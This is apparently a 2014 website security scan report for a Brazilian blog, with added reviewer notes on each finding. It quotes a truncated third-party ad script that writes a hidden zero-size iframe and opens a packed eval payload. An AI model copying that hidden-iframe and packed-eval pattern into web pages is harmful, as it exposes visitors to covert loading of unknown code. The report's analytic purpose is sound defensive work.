Scanned pages/files
Request | Server response | Status |
http://entrecoisas.com.br/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 01 Jul 2014 18:13:58 GMT Location: http://www.entrecoisas.com.br/ Server: ghs Content-Length: 227 Content-Type: text/html; charset=UTF-8 Alternate-Protocol: 80:quic X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block | clean |
Reviewer note: the redirect target is plain http://, and every resource in this scan (first-party page and all third-party ad/widget scripts) was fetched over plain HTTP. Script content fetched this way can be altered in transit by an on-path attacker, which is a separate exposure from the detections listed below.
http://www.entrecoisas.com.br/ | 200 OK Content-Length: 149706 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function stripHtmlTags(s,max){return s.replace(/<.*?>/ig, '').split(/\s+/).slice(0,max-1).join(' ')} function getSummaryLikeWP(id) { return document.getElementById(id).innerHTML.split(/<!--\s*more\s*-->/)[0]; } function getSummaryImproved(post,max){ var re = /<.*?>/gi var re2 = /<br.*?>/gi var re3 = /(<\/{1}p>)|(<\/{1}div>)/gi var re4 = /(<style.*?\/{1}style>)|(< imgtag = '<div class="thumbnailimg" align="center"><img src="'+img[0].src+'" /></div>'; summ = summary_img; } } var summary = (classicMode) ? imgtag + '<div>' + stripHtmlTags(content,summ) + '</div>' : imgtag + '<div>' + getSummaryImproved(content,summ) + '</div>'; div.innerHTML = summary; div.style.display = "block"; } } Antivirus reports:
Reviewer note: the quoted fragment is shown truncated (it breaks off inside the `re4` regex). What is visible — `stripHtmlTags`, `getSummaryLikeWP`, `getSummaryImproved`, an `<img src="...">` built from `img[0].src`, and the result assigned via `div.innerHTML` — reads as a post-summary / "read more" helper that renders post content into the page. Building markup by string concatenation and writing it with `innerHTML` is a DOM injection sink, but nothing in the visible portion shows a payload, and the "Antivirus reports" list that follows is empty, so no named engine detection is actually presented here. Treat this as an unconfirmed detection until the complete script and a vendor report are obtained.
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js | 200 OK Content-Length: 55740 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://ads.egrana.com.br/anuncio/popup/1567 | 200 OK Content-Length: 6553 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe style="display:none" src="http://ads.egrana.com.br/stats/pop/" width="0" height="0" frameborder="0" marginwidh="0" marginheight="0" scrolling="no"></iframe>');eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+' Antivirus reports:
Reviewer note: two concrete indicators are visible in this third-party script — a `document.write` of a zero-size, `display:none` iframe loading `http://ads.egrana.com.br/stats/pop/`, and an `eval(function(p,a,c,k,e,r){...})` wrapper, the characteristic form of a packed (obfuscated) payload. The packed body is cut off in this report, so what it does beyond the hidden frame cannot be determined from here; decode it offline (replace the outer `eval` with a call that prints its argument) before drawing conclusions. The same pattern is used by some legitimate pop-under ad networks, and the "Antivirus reports" list that follows is empty, so this is an indicator to investigate rather than a confirmed compromise of the scanned site.
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21217 Content-Type: text/javascript | clean |
http://entrecoisas.com.br//cdn.chitika.net/getads.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 01 Jul 2014 18:14:00 GMT Location: http://www.entrecoisas.com.br//cdn.chitika.net/getads.js/ Server: ghs Content-Length: 254 Content-Type: text/html; charset=UTF-8 Alternate-Protocol: 80:quic X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block | clean |
http://www.entrecoisas.com.br//cdn.chitika.net/getads.js/ | 404 Not Found Content-Length: 106862 Content-Type: text/html | malicious |
Reviewer note: this URL (the site's own host followed by `//cdn.chitika.net/getads.js/`) is most likely a scanner artifact — a protocol-relative reference such as `//cdn.chitika.net/getads.js` resolved as a site-relative path. The 404 response is therefore the site's own error page, which explains why it carries the same summary script and the same detection as the front page entry above; it is not an additional infected resource.
Malicious code - confirmed by antiviruses (see below) function stripHtmlTags(s,max){return s.replace(/<.*?>/ig, '').split(/\s+/).slice(0,max-1).join(' ')} function getSummaryLikeWP(id) { return document.getElementById(id).innerHTML.split(/<!--\s*more\s*-->/)[0]; } function getSummaryImproved(post,max){ var re = /<.*?>/gi var re2 = /<br.*?>/gi var re3 = /(<\/{1}p>)|(<\/{1}div>)/gi var re4 = /(<style.*?\/{1}style>)|(< imgtag = '<div class="thumbnailimg" align="center"><img src="'+img[0].src+'" /></div>'; summ = summary_img; } } var summary = (classicMode) ? imgtag + '<div>' + stripHtmlTags(content,summ) + '</div>' : imgtag + '<div>' + getSummaryImproved(content,summ) + '</div>'; div.innerHTML = summary; div.style.display = "block"; } } Antivirus reports:
| ||
http://lizard1301.spider.ad/spd_display?p1=7855.divSpdSuperBanner | 200 OK Content-Length: 3 Content-Type: text/html | clean |
http://lizard1301.spider.ad/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://728x90.exad.me/js/?id=6560 | 200 OK Content-Length: 120 Content-Type: text/html | clean |
http://www.linkwithin.com/widget.js | 200 OK Content-Length: 14131 Content-Type: application/x-javascript | clean |
http://entrecoisas.com.br//s7.addthis.com/js/300/addthis_widget.js/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 01 Jul 2014 18:14:03 GMT Location: http://www.entrecoisas.com.br//s7.addthis.com/js/300/addthis_widget.js/ Server: ghs Content-Length: 268 Content-Type: text/html; charset=UTF-8 Alternate-Protocol: 80:quic X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block | clean |
http://www.entrecoisas.com.br//s7.addthis.com/js/300/addthis_widget.js/ | 404 Not Found Content-Length: 106918 Content-Type: text/html | malicious |
Reviewer note: as with the `//cdn.chitika.net/getads.js/` entry, this path (site host followed by `//s7.addthis.com/...`) is most likely a protocol-relative URL mis-resolved by the scanner. The 404 body is the site's own error page carrying the same summary script flagged on the front page, not a separate finding.
Malicious code - confirmed by antiviruses (see below) function stripHtmlTags(s,max){return s.replace(/<.*?>/ig, '').split(/\s+/).slice(0,max-1).join(' ')} function getSummaryLikeWP(id) { return document.getElementById(id).innerHTML.split(/<!--\s*more\s*-->/)[0]; } function getSummaryImproved(post,max){ var re = /<.*?>/gi var re2 = /<br.*?>/gi var re3 = /(<\/{1}p>)|(<\/{1}div>)/gi var re4 = /(<style.*?\/{1}style>)|(< imgtag = '<div class="thumbnailimg" align="center"><img src="'+img[0].src+'" /></div>'; summ = summary_img; } } var summary = (classicMode) ? imgtag + '<div>' + stripHtmlTags(content,summ) + '</div>' : imgtag + '<div>' + getSummaryImproved(content,summ) + '</div>'; div.innerHTML = summary; div.style.display = "block"; } } Antivirus reports:
| ||
http://300x250.exad.me/js/?id=6783 | 200 OK Content-Length: 121 Content-Type: text/html | clean |
http://ads.egrana.com.br/anuncio/300x250/1567 | 200 OK Content-Length: 660 Content-Type: text/html | clean |
http://ads.egrana.com.br/click.php?f=30&a=99&s=1567 | HTTP/1.1 302 Moved Temporarily Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Tue, 01 Jul 2014 18:15:18 GMT Pragma: no-cache Location: http://ad.zanox.com/ppc/?26093113C2022580779T Server: nginx/1.0.15 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT Country: LT Set-Cookie: PHPSESSID=ojgbdrah3g77608nqugiqepq01; path=/ X-Powered-By: PHP/5.4.28 | clean |
Reviewer note (third-party ad host, not the scanned site): the response sets `PHPSESSID` with neither the `HttpOnly` nor the `Secure` attribute and discloses `X-Powered-By: PHP/5.4.28` and `Server: nginx/1.0.15`. This is informational for the scanned site, but worth recording because the same host serves the packed popup script flagged above.
http://ad.zanox.com/ppc/?26093113c2022580779t | HTTP/1.1 302 Found Cache-Control: no-cache Connection: close Pragma: no-cache Location: /ppc/?26093113c2022580779t | clean |
http://lizard1301.spider.ad/spd_display?p1=7855.divSpdRetangulo | 200 OK Content-Length: 3 Content-Type: text/html | clean |
http://lizard1301.spider.ad/spd_display?p1=7855.divSpdWideSky | 200 OK Content-Length: 3 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: entrecoisas.com.br
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 01 Jul 2014 18:13:58 GMT
Location: http://www.entrecoisas.com.br/
Server: ghs
Content-Length: 227
Content-Type: text/html; charset=UTF-8
Alternate-Protocol: 80:quic
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
...227 bytes of data.
GET / HTTP/1.1
Host: entrecoisas.com.br
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 01 Jul 2014 18:13:58 GMT
Location: http://www.entrecoisas.com.br/
Server: ghs
Content-Length: 227
Content-Type: text/html; charset=UTF-8
Alternate-Protocol: 80:quic
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
...227 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: entrecoisas.com.br
Referer: http://www.google.com/search?q=entrecoisas.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.
Note that this check only varies the Referer header (a Google search referer versus none). Conditional redirects keyed on the User-Agent (for example a Googlebot UA), client IP or geolocation, cookies, or time of day are not exercised, so a negative result here does not rule out cloaked redirects.
GET / HTTP/1.1
Host: entrecoisas.com.br
Referer: http://www.google.com/search?q=entrecoisas.com.br
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=entrecoisas.com.br
Result: This site is not currently listed as suspicious.
Note: blacklist status lags detection; a site can serve flagged content for some time before (or without ever) being listed. The scan's own findings above take precedence over this lookup.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://entrecoisas.com.br/
Result: entrecoisas.com.br is not infected or malware details are not published yet.
Note: this wording is an absence of a verdict ("not infected, or details not yet published"), not a positive verdict that the site is clean.
Result: entrecoisas.com.br is not infected or malware details are not published yet.